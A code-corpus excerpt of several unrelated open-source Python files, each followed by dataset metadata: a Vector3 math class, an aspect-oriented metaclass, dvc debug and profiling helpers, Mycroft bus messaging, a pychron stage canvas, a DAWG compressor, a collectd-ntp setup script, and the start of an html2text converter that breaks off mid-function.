v = cls.__new__(cls, object)
ax, ay, az = p1
bx, by, bz = p2
v._v = [bx-ax, by-ay, bz-az]
return v
@classmethod
def from_floats(cls, x, y, z):
"""Creates a Vector3 from individual float values.
Warning: There is no checking for efficiency here: x, y, z _must_ be
floats.
"""
v = cls.__new__(cls, object)
v._v = [x, y, z]
return v
@classmethod
def from_iter(cls, iterable):
"""Creates a Vector3 from an iterable containing at least 3 values."""
it = iter(iterable)
next = it.next
v = cls.__new__(cls, object)
v._v = [ float(next()), float(next()), float(next()) ]
return v
def copy(self):
"""Returns a copy of this vector."""
v = self.__new__(self.__class__, object)
v._v = self._v[:]
return v
#return self.from_floats(self._v[0], self._v[1], self._v[2])
__copy__ = copy
def _get_x(self):
return self._v[0]
def _set_x(self, x):
assert isinstance(x, float), "Must be a float"
self._v[0] = x
x = property(_get_x, _set_x, None, "x component.")
def _get_y(self):
return self._v[1]
def _set_y(self, y):
assert isinstance(y, float), "Must be a float"
self._v[1] = y
y = property(_get_y, _set_y, None, "y component.")
def _get_z(self):
return self._v[2]
def _set_z(self, z):
assert isinstance(z, float), "Must be a float"
self._v[2] = z
z = property(_get_z, _set_z, None, "z component.")
def _get_length(self):
x, y, z = self._v
return sqrt(x*x + y*y +z*z)
def _set_length(self, length):
v = self._v
try:
x, y, z = v
l = length / sqrt(x*x + y*y +z*z)
except ZeroDivisionError:
v[0] = 0.
v[1] = 0.
v[2] = 0.
return self
v[0] = x*l
v[1] = y*l
v[2] = z*l
length = property(_get_length, _set_length, None, "Length of the vector")
def unit(self):
"""Returns a unit vector."""
x, y, z = self._v
l = sqrt(x*x + y*y + z*z)
return self.from_floats(x/l, y/l, z/l)
def set(self, x, y, z):
"""Sets the components of this vector.
x -- x component
y -- y component
z -- z component
"""
assert ( isinstance(x, float) and
isinstance(y, float) and
isinstance(z, float) ), "x, y, z must be floats"
v = self._v
v[0] = x
v[1] = y
v[2] = z
return self
def __str__(self):
x, y, z = self._v
return "(%s, %s, %s)" % (format_number(x),
format_number(y),
format_number(z))
def __repr__(self):
x, y, z = self._v
return "Vector3(%s, %s, %s)" % (x, y, z)
def __len__(self):
return 3
def __iter__(self):
"""Iterates the components in x, y, z order."""
return iter(self._v[:])
def __getitem__(self, index):
"""Retrieves a component, given its index.
index -- 0, 1 or 2 for x, y or z
"""
try:
return self._v[index]
except IndexError:
raise IndexError, "There are 3 values in this object, index should be 0, 1 or 2!"
def __setitem__(self, index, value):
"""Sets a component, given its index.
index -- 0, 1 or 2 for x, y or z
value -- New (float) value of component
"""
assert isinstance(value, float), "Must be a float"
try:
self._v[index] = value
except IndexError:
raise IndexError, "There are 3 values in this object, index should be 0, 1 or 2!"
def __eq__(self, rhs):
"""Test for equality
rhs -- Vector or sequence of 3 values
"""
x, y, z = self._v
xx, yy, zz = rhs
return x==xx and y==yy and z==zz
def __ne__(self, rhs):
"""Test of inequality
rhs -- Vector or sequenece of 3 values
"""
x, y, z = self._v
xx, yy, zz = rhs
return x!=xx or y!=yy or z!=zz
def __hash__(self):
return hash(tuple(self._v))
def __add__(self, rhs):
"""Returns the result of adding a vector (or collection of 3 numbers)
from this vector.
rhs -- Vector or sequence of 2 values
"""
x, y, z = self._v
ox, oy, oz = rhs
return self.from_floats(x+ox, y+oy, z+oz)
def __iadd__(self, rhs):
"""Adds another vector (or a collection of 3 numbers) to this vector.
rhs -- Vector or sequence of 2 values
"""
ox, oy, oz = rhs
v = self._v
v[0] += ox
v[1] += oy
v[2] += oz
return self
def __radd__(self, lhs):
"""Adds vector to this vector (right version)
lhs -- Left hand side vector or sequence
"""
x, y, z = self._v
ox, oy, oz = lhs
return self.from_floats(x+ox, y+oy, z+oz)
def __sub__(self, rhs):
"""Returns the result of subtracting a vector (or collection of
3 numbers) from this vector.
rhs -- 3 values
"""
x, y, z = self._v
ox, oy, oz = rhs
return self.from_floats(x-ox, y-oy, z-oz)
def __isub__(self, rhs):
"""Subtracts another vector (or a collection of 3 numbers) from this
vector.
rhs -- Vector or sequence of 3 values
"""
ox, oy, oz = rhs
v = self._v
v[0] -= ox
v[1] -= oy
v[2] -= oz
return self
def __rsub__(self, lhs):
"""Subtracts a vector (right version)
lhs -- Left hand side vector or sequence
"""
x, y, z = self._v
ox, oy, oz = lhs
return self.from_floats(ox-x, oy-y, oz-z)
def scalar_mul(self, scalar):
v = self._v
v[0] *= scalar
v[1] *= scalar
v[2] *= scalar
def vector_mul(self, vector):
x, y, z = vector
v= self._v
v[0] *= x
v[1] *= y
v[2] *= z
def get_scalar_mul(self, scalar):
x, y, z = self._v
return self.from_floats(x*scalar, y*scalar, z*scalar)
def get_vector_mul(self, vector):
x, y, z = self._v
xx, yy, zz = vector
return self.from_floats(x * xx, y * yy, z * zz)
def __mul__(self, rhs):
"""Return the result of multiplying this vector by another vector, or
a scalar (single number).
rhs -- Vector, sequence or single value.
"""
x, y, z = self._v
if hasattr(rhs, "__getitem__"):
ox, oy, oz = rhs
return self.from_floats(x*ox, y*oy, z*oz)
else:
return self.from_floats(x*rhs, y*rhs, z*rhs)
def __imul__(self, rhs):
"""Multiply this vector by another vector, or a scalar
(single number).
rhs -- Vector, sequence or single value.
"""
v = self._v
if hasattr(rhs, "__getitem__"):
ox, oy, oz = rhs
v[0] *= ox
v[1] *= oy
v[2] *= oz
else:
v[0] *= rhs
v[1] *= rhs
v[2] *= rhs
return self
def __rmul__(self, lhs):
x, y, z = self._v
if hasattr(lhs, "__getitem__"):
ox, oy, oz = lhs
return self.from_floats(x*ox, y*oy, z*oz)
else:
return self.from_floats(x*lhs, y*lhs, z*lhs)
def __div__(self, rhs):
"""Return the result of dividing this vector by another vector, or a scalar (single number)."""
x, y, z = self._v
if hasattr(rhs, "__getitem__"):
ox, oy, oz = rhs
return self.from_floats(x/ox, y/oy, z/oz)
else:
return self.from_floats(x/rhs, y/rhs, z/rhs)
def __idiv__(self, rhs):
"""Divide this vector by another vector, or a scalar (single number)."""
v = self._v
if hasattr(rhs, "__getitem__"):
v[0] /= ox
v[1] /= oy
v[2] /= oz
else:
v[0] /= rhs
v[1] /= rhs
v[2] /= rhs
return self
def __rdiv__(self, lhs):
x, y, z = self._v
if hasattr(lhs, "__getitem__"):
ox, oy, oz = lhs
return self.from_floats(ox/x, oy/y, oz/z)
else:
return self.from_floats(lhs/x, lhs/y, lhs/z)
def scalar_div(self, scalar):
v = self._v
v[0] /= scalar
v[1] /= scalar
v[2] /= scalar
def vector_div(self, vector):
x, y, z = vector
v= self._v
v[0] /= x
v[1] /= y
v[2] /= z
def get_scalar_div(self, scalar):
x, y, z = self._v
return self.from_floats(x / scalar, y / scalar, z / scalar)
def get_vector_div(self, vector):
x, y, z = self._v
xx, yy, zz = vector
return self.from_floats(x / xx, y / yy, z / zz)
def __neg__(self):
"""Returns the negation of this vector (a vector pointing in the opposite direction.
eg v1 = Vector(1,2,3)
print -v1
>>> (-1,-2,-3)
"""
x, y, z = self._v
return self.from_floats(-x, -y, -z)
def __pos__(self):
return self.copy()
def __nonzero__(self):
x, y, z = self._v
return x and y and z
def __call__(self, keys):
"""Returns a tuple of the values in a vector
keys -- An iterable containing the keys (x, y or z)
eg v = Vector3(1.0, 2.0, 3.0)
v('zyx') -> (3.0, 2.0, 1.0)
"""
ord_x = ord('x')
v = self._v
return tuple( v[ord(c)-ord_x] for c in keys )
def as_tuple(self):
"""Returns a tuple of the x, y, z components. A little quicker than
tuple(vector)."""
return tuple(self._v)
def scale(self, scale):
"""Scales the vector by onther vector or a scalar. Same as the
*= operator.
scale -- Value to scale the vector by
"""
v = self._v
if hasattr(rhs, "__getitem__"):
ox, oy, oz = rhs
v[0] *= ox
v[1] *= oy
v[2] *= oz
else:
v[0] *= rhs
v[1] *= rhs
v[2] *= rhs
return self
def get_length(self):
"""Calculates the length of the vector."""
x, y, z = self._v
return sqrt(x*x + y*y +z*z)
get_magnitude = get_length
def set_length(self, new_length):
"""Sets the length of the vector. (Normalises it then scales it)
new_length -- The new length of the vector.
"""
v = self._v
try:
x, y, z = v
l = new_length / sqrt(x*x + y*y + z*z)
except ZeroDivisionError:
v[0] = 0.0
v[1] = 0.0
v[2] = 0.0
return self
v[0] = x*l
v[1] = y*l
v[2] = z*l
return self
def get_distance_to(self, p):
"""Returns the distance of this vector to a point.
p -- A position as a vector, or collection of 3 values.
"""
ax, ay, az = self._v
bx, by, bz = p
dx = ax-bx
dy = ay-by
dz = az-bz
return sqrt( dx*dx + dy*dy + dz*dz )
def get_distance_to_squared(self, p):
"""Returns the squared distance of this vector to a point.
p -- A position as a vector, or collection of 3 values.
"""
ax, ay, az = self._v
bx, by, bz = p
dx = ax-bx
dy = ay-by
dz = az-bz
return dx*dx + dy*dy + dz*dz
def normalise(self):
"""Scales the vector to be length 1."""
v = self._v
x, y, z = v
l = sqrt(x*x + y*y + z*z)
try:
v[0] /= l
v[1] /= l
v[2] /= l
except ZeroDivisionError:
v[0] = 0.0
v[1] = 0.0
v[2] = 0.0
return self
normalize = normalise
def get_normalised(self):
x, y, z = self._v
l = sqrt(x*x + y*y + z*z)
return self.from_floats(x/l, y/l, z/l)
get_normalized = get_normalised
def in_sphere(self, sphere):
"""Returns true if this vector (treated as a position) is contained in
the given sphere.
"""
return distance3d(sphere.position, self) <= sphere.radius
def dot(self, other):
"""Returns the dot product of this vector with another.
other -- A vector or tuple
"""
x, y, z = self._v
ox, oy, oz = other
return x*ox + y*oy + z*oz
def cross(self, other):
"""Returns the cross product of this vector with another.
other -- A vector or tuple
"""
x, y, z = self._v
bx, by, bz = other
return self.from_floats( y*bz - by*z,
z*bx - bz*x,
x*by - bx*y )
def cross_tuple(self, other):
"""Returns the cross product of this vector with another, as a tuple.
This avoids the Vector3 construction if you don't need it.
other -- A vector or tuple
"""
x, y, z = self._v
bx, by, bz = other
return ( y*bz - by*z,
z*bx - bz*x,
x*by - bx*y )
def distance3d_squared(p1, p2):
x, y, z = p1
xx, yy, zz = p2
dx = x - xx
dy = y - yy
dz = z - zz
return dx*dx + dy*dy +dz*dz
def distance3d(p1, p2):
x, y, z = p1
xx, yy, zz = p2
dx = x - xx
dy = y - yy
dz = z - zz
return sqrt(dx*dx + dy*dy +dz*dz)
def centre_point3d(points):
return sum( Vector3(p) for p in points ) / len(points)
if __name__ == "__main__":
v1 = Vector3(2.2323, 3.43242, 1.)
print 3*v1
print (2, 4, 6)*v1
print (1, 2, 3)+v1
print v1('xxxyyyzzz')
print v1[2]
print v1.z
v1[2]=5.
print v1
v2= Vector3(1.2, 5, 10)
print v2
v1 += v2
print v1.get_length()
print repr(v1)
print v1[1]
p1 = Vector3(1,2,3)
print p1
print repr(p1)
for v in p1:
print v
#print p1[6]
ptest = Vector3( [1,2,3] )
print ptest
z = Vector3()
print z
file("test.txt", "w").write( "\n".join(str(float(n)) for n in range(20)) )
f = file("test.txt")
v1 = Vector3.from_iter( f )
v2 = Vector3.from_iter( f )
v3 = Vector3.from_iter( f )
print v1, v2, v3
print "--"
print v1
print v1 + (10,20,30)
print v1('xz')
print -v1
#print tuple(ptest)
#p1.set( (4, 5, 6) )
#print p1
print Vector3(10,10,30)+v1
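    # Extra demonstrations (an added sketch, not in the original demo):
    # dot product, cross product and normalisation using the methods above.
    a = Vector3(1, 0, 0)
    b = Vector3(0, 1, 0)
    print a.dot(b)                           # expected 0
    print a.cross(b)                         # expected a unit vector along z
    print Vector3(3, 4, 0).get_normalised()  # expected (0.6, 0.8, 0.0)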
|
mit
| -5,893,449,000,307,266,000 | 23.576923 | 117 | 0.408233 | false | 3.65716 | false | false | false |
andresriancho/python-aop
|
aop/aspecttype.py
|
1
|
1966
|
# -*- coding: utf-8 -*-
"""
python-aop is part of LemonFramework.
python-aop is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
python-aop is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with python-aop. If not, see <http://www.gnu.org/licenses/>.
Copyright (c) 2013 Vicente Ruiz <[email protected]>
"""
class AspectType(type):
    """Metaclass for building aspects. Adds a ``pointcut`` method to the
    class, which allows an advise to be bound to a joinpoint."""
    def __new__(mcs, name, bases, classdict):
        # Prepare a function in charge of performing the pointcut for
        # any method or attribute of the class
        def pointcut(cls, joinpoint, advise_class, **kwargs):
            # Prepare the point where the aspect will be executed
            joinpoint_attr = getattr(cls, joinpoint)
            # Collect additional parameters for the aspect
            advise_args = () if not 'args' in kwargs else tuple(kwargs['args'])
            advise_kwargs = {} if not 'kwargs' in kwargs else dict(kwargs['kwargs'])
            # Create the advise
            advise = advise_class(joinpoint_attr, *advise_args, **advise_kwargs)
            # Prepare a wrapper
            def wrapper(self, *args, **kwargs):
                return advise(self, *args, **kwargs)
            setattr(cls, joinpoint, wrapper)
        # Add the ``pointcut`` method to the class
        classdict['pointcut'] = classmethod(pointcut)
        return type.__new__(mcs, name, bases, classdict)
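# A minimal usage sketch (an illustrative addition, not part of python-aop):
# ``LoggingAdvise`` and ``Greeter`` are hypothetical names used only to show
# how the ``pointcut`` classmethod installed by the metaclass binds an advise
# to a joinpoint.
if __name__ == '__main__':
    class LoggingAdvise(object):
        """Advise that logs the call before delegating to the joinpoint."""
        def __init__(self, joinpoint, *args, **kwargs):
            self.joinpoint = joinpoint
        def __call__(self, instance, *args, **kwargs):
            print('calling %s' % self.joinpoint.__name__)
            return self.joinpoint(instance, *args, **kwargs)
    # Python 3 metaclass syntax; under Python 2 this would instead be
    # ``__metaclass__ = AspectType`` inside the class body.
    class Greeter(metaclass=AspectType):
        def greet(self, name):
            return 'Hello, %s' % name
    Greeter.pointcut('greet', LoggingAdvise)
    print(Greeter().greet('world'))  # prints "calling greet", then the greeting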
|
gpl-3.0
| -6,336,378,035,457,480,000 | 44.488372 | 84 | 0.676892 | false | 3.549909 | false | false | false |
efiop/dvc
|
dvc/_debug.py
|
1
|
2310
|
from contextlib import ExitStack, contextmanager
from typing import TYPE_CHECKING
if TYPE_CHECKING:
from argparse import Namespace
@contextmanager
def instrument(html_output=False):
"""Run a statistical profiler"""
try:
from pyinstrument import Profiler # pylint: disable=import-error
except ImportError:
print("Failed to run profiler, pyinstrument is not installed")
yield
return
profiler = Profiler()
profiler.start()
yield
profiler.stop()
if html_output:
profiler.open_in_browser()
return
print(profiler.output_text(unicode=True, color=True))
@contextmanager
def profile(dump_path: str = None):
"""Run a cprofile"""
import cProfile
prof = cProfile.Profile()
prof.enable()
yield
prof.disable()
if not dump_path:
prof.print_stats(sort="cumtime")
return
prof.dump_stats(dump_path)
@contextmanager
def debug():
try:
yield
except Exception: # pylint: disable=broad-except
try:
import ipdb as pdb # noqa: T100, pylint: disable=import-error
except ImportError:
import pdb # noqa: T100
pdb.post_mortem()
raise # prevent from jumping ahead
@contextmanager
def debugtools(args: "Namespace" = None, **kwargs):
kw = vars(args) if args else {}
kw.update(kwargs)
with ExitStack() as stack:
if kw.get("pdb"):
stack.enter_context(debug())
if kw.get("cprofile") or kw.get("cprofile_dump"):
stack.enter_context(profile(kw.get("cprofile_dump")))
if kw.get("instrument") or kw.get("instrument_open"):
stack.enter_context(instrument(kw.get("instrument_open", False)))
yield
def add_debugging_flags(parser):
from argparse import SUPPRESS
parser.add_argument(
"--cprofile", action="store_true", default=False, help=SUPPRESS
)
parser.add_argument("--cprofile-dump", help=SUPPRESS)
parser.add_argument(
"--pdb", action="store_true", default=False, help=SUPPRESS
)
parser.add_argument(
"--instrument", action="store_true", default=False, help=SUPPRESS
)
parser.add_argument(
"--instrument-open", action="store_true", default=False, help=SUPPRESS
)
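# A minimal usage sketch (an assumption for illustration, not part of dvc):
# an entry point can register the hidden debug flags and wrap its work in
# ``debugtools`` so that --pdb / --cprofile / --instrument take effect.
if __name__ == "__main__":
    import argparse
    parser = argparse.ArgumentParser()
    add_debugging_flags(parser)
    args = parser.parse_args()
    with debugtools(args):
        print("command body runs here")  # placeholder for the real work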
|
apache-2.0
| 1,679,155,082,171,922,400 | 24.384615 | 78 | 0.634632 | false | 3.975904 | false | false | false |
JarbasAI/JarbasAI
|
mycroft/messagebus/api.py
|
1
|
2458
|
from mycroft.messagebus.message import Message
import time
__author__ = "jarbas"
class BusQuery():
def __init__(self, emitter, message_type, message_data=None,
message_context=None):
self.emitter = emitter
self.waiting = False
self.response = Message(None, None, None)
self.query_type = message_type
self.query_data = message_data
self.query_context = message_context
def _end_wait(self, message):
self.response = message
self.waiting = False
def _wait_response(self, timeout):
start = time.time()
elapsed = 0
self.waiting = True
while self.waiting and elapsed < timeout:
elapsed = time.time() - start
time.sleep(0.1)
self.waiting = False
def send(self, response_type=None, timeout=10):
self.response = Message(None, None, None)
if response_type is None:
response_type = self.query_type + ".reply"
self.add_response_type(response_type)
self.emitter.emit(
Message(self.query_type, self.query_data, self.query_context))
self._wait_response(timeout)
return self.response.data
def add_response_type(self, response_type):
self.emitter.once(response_type, self._end_wait)
def get_response_type(self):
return self.response.type
def get_response_data(self):
return self.response.data
def get_response_context(self):
return self.response.context
class BusResponder():
def __init__(self, emitter, response_type, response_data=None,
response_context=None, trigger_messages=None):
self.emitter = emitter
self.response_type = response_type
self.response_data = response_data
self.response_context = response_context
if trigger_messages is None:
trigger_messages = []
for message_type in trigger_messages:
self.listen(message_type)
def listen(self, message_type):
self.emitter.on(message_type, self.respond)
def update_response(self, data=None, context=None):
if data is not None:
self.response_data = data
if context is not None:
self.response_context = context
def respond(self, message):
self.emitter.emit(Message(self.response_type, self.response_data,
self.response_context))
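# Hypothetical usage sketch (illustrative only; it needs a live Mycroft
# message bus, and ``emitter`` is assumed to be a connected client exposing
# emit/on/once):
#
#   responder = BusResponder(emitter, "my.skill.request.reply",
#                            response_data={"answer": 42},
#                            trigger_messages=["my.skill.request"])
#   query = BusQuery(emitter, "my.skill.request")
#   data = query.send()  # waits up to 10s for "my.skill.request.reply"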
|
gpl-3.0
| 1,356,580,934,561,058,300 | 31.342105 | 74 | 0.617168 | false | 4.009788 | false | false | false |
USGSDenverPychron/pychron
|
pychron/canvas/canvas2D/stage_canvas.py
|
1
|
5114
|
# ===============================================================================
# Copyright 2015 Jake Ross
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ===============================================================================
# ============= enthought library imports =======================
from traits.api import Instance, Tuple, Color, Bool, Any, Float, Property
# ============= standard library imports ========================
# ============= local library imports ==========================
from pychron.canvas.canvas2D.crosshairs_overlay import CrosshairsOverlay, SimpleCrosshairsOverlay
from pychron.canvas.canvas2D.map_canvas import MapCanvas
DIRECTIONS = {'Left': ('x', -1), 'Right': ('x', 1),
'Down': ('y', -1), 'Up': ('y', 1)}
class StageCanvas(MapCanvas):
crosshairs_overlay = Instance(SimpleCrosshairsOverlay)
crosshairs_color = Color('black')
stage_position = Property(depends_on='_stage_position')
_stage_position = Tuple(Float, Float)
desired_position = Property(depends_on='_desired_position')
_desired_position = Any
show_current_position = Bool(True)
current_position = Property(depends_on='cur_pos')
cur_pos = Tuple(Float(0), Float(0))
show_desired_position = Bool(True)
desired_position_color = Color('green')
def get_stage_screen_position(self):
return self.map_screen([self._stage_position])[0]
def get_stage_position(self):
return self._stage_position
def set_stage_position(self, x, y):
"""
"""
if x is not None and y is not None:
self._stage_position = (x, y)
self.invalidate_and_redraw()
def clear_desired_position(self):
self._desired_position = None
self.request_redraw()
def set_desired_position(self, x, y):
"""
"""
self._desired_position = (x, y)
self.request_redraw()
# ===============================================================================
# interactor
# ===============================================================================
def normal_mouse_move(self, event):
"""
"""
self.cur_pos = (event.x, event.y)
if self.valid_position(event.x, event.y):
event.window.set_pointer(self.cross_pointer)
else:
event.window.set_pointer(self.normal_pointer)
event.handled = True
# self.request_redraw()
def normal_mouse_enter(self, event):
"""
"""
event.window.set_pointer(self.cross_pointer)
event.handled = True
def normal_mouse_leave(self, event):
"""
"""
event.window.set_pointer(self.normal_pointer)
self.request_redraw()
event.handled = True
def normal_key_pressed(self, event):
c = event.character
if c in ('Left', 'Right', 'Up', 'Down'):
ax_key, direction = DIRECTIONS[c]
direction = self._calc_relative_move_direction(c, direction)
distance = 5 if event.shift_down else 1
self.stage_manager.relative_move(ax_key, direction, distance)
event.handled = True
elif c in ('a', 'A'):
self.stage_manager.accept_point()
def key_released(self, char):
"""
called from outside by StageCompnentEditor
"""
self.stage_manager.key_released()
# ===============================================================================
# private
# ===============================================================================
def _calc_relative_move_direction(self, char, direction):
return direction
def _add_crosshairs(self, klass=None):
if klass is None:
klass = CrosshairsOverlay
ch = klass(component=self)
self.crosshairs_overlay = ch
self.overlays.append(ch)
# ===============================================================================
# property get/set
# ===============================================================================
def _get_current_position(self):
md = self.map_data(self.cur_pos)
return self.cur_pos[0], md[0], self.cur_pos[1], md[1]
def _get_stage_position(self):
"""
"""
return self.map_screen([self._stage_position])[0]
def _get_desired_position(self):
"""
"""
if self._desired_position is not None:
x, y = self.map_screen([self._desired_position])[0]
return x, y
# ============= EOF =============================================
|
apache-2.0
| 5,148,437,984,851,985,000 | 33.554054 | 97 | 0.51447 | false | 4.333898 | false | false | false |
AndrasKovacs/dawg-gen
|
dawg_gen.py
|
1
|
7469
|
#!/usr/bin/env python
import os
import array as ar
import hashlib
from sys import argv
from copy import copy
from collections import defaultdict
from time import clock
######################## Read/check word list ###############################
print
if len(argv) != 2:
print "Usage: dawg_gen.py [word list path]"
exit(1)
filename = argv[1]
time = clock()
print "Checking word list...",
try:
wordlist = open(filename).read().split()
except IOError:
print "File not found."
exit(1)
if not all(all(c.isupper() for c in w) for w in wordlist) or any(b < a for a,b in zip(wordlist, wordlist[1:])):
print
print "Invalid word list; please include alphabetically sorted uppercase words delimited by space or newline."
exit(1)
print "OK".ljust(13),
print "finished in {:.4} seconds.".format(clock()-time)
######################## Build Trie #########################################
class SeqTrie(object):
def __init__(self, init = tuple(), is_end = False, val = "", end_of_list = False):
self.children = []
self.is_end = is_end
self.val = val
self.end_of_list = end_of_list
for x in init:
self.add(x)
def add(self, word):
for c in word:
if not self.children or self.children[-1].val != c: #only works on pre-sorted word lists!
self.children.append(SeqTrie())
self = self.children[-1]
self.val = c
self.is_end = True
def __iter__(self):
for x in self.children:
for y in x.__iter__():
yield y
yield self
t = clock()
print "Building trie...".ljust(35),
trie = SeqTrie(wordlist)
print "finished in {:.4} seconds.".format(clock()-t)
################### Generate hashes/merge nodes, ###########################
t = clock()
print "Merging redundant nodes...".ljust(35),
node_dict = {}
for x in trie:
hash_str = "".join((str(x.is_end), x.val, "".join(y.hash for y in x.children)))
x.hash = hashlib.md5(hash_str).digest()
if x.hash not in node_dict:
node_dict[x.hash] = x
for i,y in enumerate(x.children):
x.children[i] = node_dict[y.hash]
x.children = tuple(sorted(x.children))
clist_dict = {x.children: x.children for x in node_dict.itervalues()}
for x in node_dict.itervalues():
x.children = clist_dict[x.children]
print "finished in {:.4} seconds.".format(clock()-t)
########################## Merge child lists ###############################
t = clock()
print "Merging child lists...".ljust(35),
inverse_dict = defaultdict(list)
compress_dict = {x:[x] for x in clist_dict.itervalues() if x}
for clist in clist_dict.itervalues():
for node in clist:
inverse_dict[node].append(clist)
for x in inverse_dict:
inverse_dict[x].sort( key = lambda x: (len(x), sum(len(inverse_dict[y]) for y in x) ))
for clist in sorted(compress_dict.keys(), key = lambda x:(len(x), -1*sum(len(inverse_dict[y]) for y in x)), reverse=True):
for other in min((inverse_dict[x] for x in clist), key = len):
if compress_dict[other] and set(clist) < set(compress_dict[other][-1]):
compress_dict[other].append(clist)
compress_dict[clist] = False
break
compress_dict = {x:l for x,l in compress_dict.iteritems() if l}
print "finished in {:.4} seconds.".format(clock()-t)
#################### Create compressed trie structure #######################
t = clock()
print "Creating compressed node array...".ljust(35),
end_node = SeqTrie(init = (), is_end = False, val = "", end_of_list = True)
end_node.children = ()
array = [0,]*(sum(len(x[0]) for x in compress_dict.itervalues()) + 1)
clist_indices = {}
array[0] = end_node
clist_indices[()] = 0
pos = 1
for stuff in compress_dict.itervalues():
if len(stuff) > 1:
sort = [0]*26
for i, clist in enumerate(stuff):
for y in clist:
sort[ord(y.val) - ord('A')] = (i, y)
stuff.append([n for i,n in sorted(x for x in sort if x)])
for clist in stuff[:-1]:
clist_indices[clist] = pos + len(stuff[0]) - len(clist)
else:
clist_indices[stuff[0]] = pos
clist = stuff[-1]
array[pos:pos+len(clist)] = map(copy, clist)
pos += len(clist)
array[pos-1].end_of_list = True
for x in array:
x.children = clist_indices[x.children]
root = clist_indices[trie.children]
root_node = SeqTrie(init = (), is_end = False, val = "", end_of_list = True)
root_node.children = root
array.append(root_node)
print "finished in {:.4} seconds.".format(clock()-t)
######################### check trie ###################################
t = clock()
print "Checking output correctness...",
def extract_words(array, i=root, carry = ""):
node = array[i]
if not node.val:
return
while True:
for x in extract_words(array, node.children, carry + node.val):
yield x
if node.is_end:
yield carry + node.val
if node.end_of_list: break
i += 1
node = array[i]
if set(extract_words(array)) == set(wordlist):
print "OK".ljust(4), "finished in {:.4} seconds.".format(clock()-t)
else:
print "INVALID OUTPUT: trie does not match original word list."
exit(1)
print
print "Compression finished in {:.4} seconds.".format(clock()-time)
print "Number of nodes:", len(array)
print
################## export as bitpacked array binaries #########################
def prompt_filename():
while True:
inp = raw_input("Enter export path: ")
if os.path.exists(inp):
while True:
choice = raw_input("File already exists. Overwrite? ")
if choice in ('y', 'Y'): return inp
if choice in ('n', 'N'): break
else:
return inp
def prompt_packing_mode():
ok_3b = len(array) <= 2**17
ok_4b = len(array) <= 2**22
while True:
print
print "Choose node size:"
print " (3) bytes" + " -> UNAVAILABLE: number of nodes above 2**17-1 or 131071"*(not ok_3b)
print " (4) bytes" + " -> UNAVAILABLE: number of nodes above 2**22-1 or 4194303"*(not ok_4b)
print
mode = raw_input("> ")
if mode in ok_3b*"3" + ok_4b*"4":
return mode
inp = prompt_filename()
mode = prompt_packing_mode()
t = clock()
print
print "Exporting as bit-packed array...",
if mode == "4":
output = ar.array('L', [0]*len(array))
for i,x in enumerate(array):
output[i] |= (x.children << 10)
output[i] |= ((ord(x.val) if x.val else 0) << 2)
output[i] |= (x.end_of_list<<1)
output[i] |= (x.is_end)
outfile = open(inp, "wb")
output.tofile(outfile)
outfile.close()
print "finished in {:.4} seconds.".format(clock()-t)
elif mode == "3":
output = ar.array('B', [0]*(len(array)*3))
for i,x in enumerate(array):
i *= 3
a, b, c = i, i+1, i+2
output[a] = (x.children & 0b00000000011111111)
output[b] = (x.children & 0b01111111100000000) >> 8
output[c] = (x.children & 0b10000000000000000) >> 9
output[c] |= ((ord(x.val) - ord('A') + 1 if x.val else 0) << 2) # 0 is reserved for root and end-of-trie nodes
output[c] |= (x.end_of_list<<1)
output[c] |= (x.is_end)
outfile = open(inp, "wb")
output.tofile(outfile)
outfile.close()
print "finished in {:.4} seconds.".format(clock()-t)
|
mit
| -984,014,338,422,908,400 | 28.405512 | 122 | 0.560718 | false | 3.283077 | false | false | false |
ministryofjustice/collectd-ntp
|
setup.py
|
1
|
1397
|
import os
from setuptools import setup
def pkg_dir(path):
return os.path.join(os.path.dirname(__file__), path)
with open(pkg_dir('VERSION'), 'r') as f:
version = f.read().strip()
with open(pkg_dir('README.rst'), 'r') as f:
readme = f.read()
setup(
name='collectd-ntp',
version=version,
py_modules=['ntpoffset'],
install_requires=['ntplib>=0.3.3,<1', 'dnspython>=1.12.0,<2'],
author='Andy Driver',
author_email='[email protected]',
maintainer='MOJDS',
url='https://github.com/ministryofjustice/collectd-ntp',
description='NTP offsets plugin for collectd',
long_description=readme,
license='LICENSE',
keywords=['python', 'ministryofjustice', 'collectd', 'ntp'],
test_suite='tests',
classifiers=[
'Programming Language :: Python',
'Programming Language :: Python :: 2.7',
'License :: OSI Approved :: MIT License',
'Operating System :: OS Independent',
'Development Status :: 3 - Alpha',
'Environment :: Plugins',
'Intended Audience :: Developers',
'Natural Language :: English',
'Topic :: Internet',
'Topic :: Software Development :: Libraries :: Python Modules',
'Topic :: System :: Monitoring',
'Topic :: System :: Networking :: Monitoring',
'Topic :: System :: Networking :: Time Synchronization']
)
|
mit
| 2,740,606,144,956,291,000 | 30.044444 | 71 | 0.614173 | false | 3.775676 | false | false | false |
idiles/opendict
|
lib/extra/html2text.py
|
1
|
4084
|
"""
html2text.py
convert an html doc to text
"""
# system libraries
import os, sys, string, time, getopt
import re
WIDTH = 80
def tag_replace (data,center,indent, use_ansi = 0):
data = re.sub ("\s+", " ", data)
data = re.sub ("(?s)<!--.*?-->", "", data)
data = string.replace (data, "\n", " ")
output = []
# modified 6/17/99 splits on all cases of "img" tags
# imgs = re.split ("(?s)(<img.*?>)", data)
imgs = re.split ("(?si)(<img.*?>)", data)
for img in imgs:
if string.lower(img[:4]) == "<img":
alt = re.search ("(?si)alt\s*=\s*\"([^\"]*)\"", img)
if not alt:
alt = re.search ("(?si)alt\s*=([^\s]*)", img)
if alt:
output.append ("%s" % img[alt.start(1):alt.end(1)])
else:
output.append ("[img]")
else:
output.append (img)
data = string.join (output, "")
data = re.sub ("(?i)<br>", "\n", data)
data = re.sub ("(?i)<hr[^>]*>", "\n" + "-"*50 + "\n", data)
data = re.sub ("(?i)<li>", "\n* ", data)
if use_ansi:
data = re.sub ("(?i)<h[0-9]>", "\n[32m", data)
else:
data = re.sub ("(?i)<h[0-9]>", "\n", data)
if use_ansi:
